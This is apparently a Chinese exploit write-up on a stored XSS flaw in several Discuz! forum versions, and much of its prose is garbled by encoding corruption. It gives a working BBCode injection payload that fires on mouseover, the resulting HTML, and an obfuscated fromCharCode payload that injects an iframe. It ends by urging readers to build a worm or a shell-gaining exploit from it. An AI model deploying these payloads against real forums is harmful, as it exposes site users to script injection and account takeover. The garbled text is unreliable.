Discuz!多版本爆存儲型XSS漏洞
XSS漏洞的測試案例分析如下:
2009年一次偶然間測試發(fā)現(xiàn)的此XSS漏洞,因?yàn)槭谴鎯π偷?,我想大家?yīng)該知道它的危害吧。相隔這么多年Discuz不斷的更新版本,但此XSS漏洞依然存在。
在此我要感謝一下我的好朋友Jackal在09年的時(shí)候一起幫我測試漏洞的。當(dāng)時(shí)我們一起測試的是Discuz6.0-Discuz7.2,不知道是不是通殺啊。沒有一個(gè)一個(gè)去測試。有條件的去測試一下吧。
發(fā)貼進(jìn)入源碼模式,寫入如下的exp
- [email][url][img]http://www.linuxso.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]
上面代碼是以鼠標(biāo)事件來觸發(fā)XSS的,剩下的大家可以自行發(fā)揮構(gòu)造!
附上XSS完的源碼如下:
- <a href="mailto:"></a><a href="%5C%22http://qhkest.com" onmouseover="alert(/DZ-xss-0day/);" \"="" target="\"_blank\""><img src="http://qhkest.com%20onmouseover=alert%28/DZ-xss-0day/%29;" onload="thumbImg(this)" alt=""> </a><
我想你們一看就明白了吧!
漏洞證明:
本地測試結(jié)果:
Discuz! X2
以下應(yīng)用華東耶穌的話:雞肋在于,要鼠標(biāo)觸碰才能觸發(fā),但是,鼠標(biāo)觸碰還是概率很大很大的嘛。
把上面的alert(/DZ-XSS-0DAY/)換成
- eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,
- 121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,
- 101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,
- 34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,
- 102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,
- 48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,
- 84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,
- 105,108,100,40,102,41,59))
鼠標(biāo)觸碰效果:
加密過程,就是10進(jìn)制加密啦,如圖。
解密下看下代碼。
好了,希望看完的朋友能寫出個(gè)蠕蟲,或者寫個(gè)直接getshell的東西。我記得曾經(jīng)有人寫過dz的xss直接getshell的。
Discuz和多版本爆存儲型XSS漏洞的介紹就結(jié)束了,有興趣的朋友請繼關(guān)注此類資源。
【編輯推薦】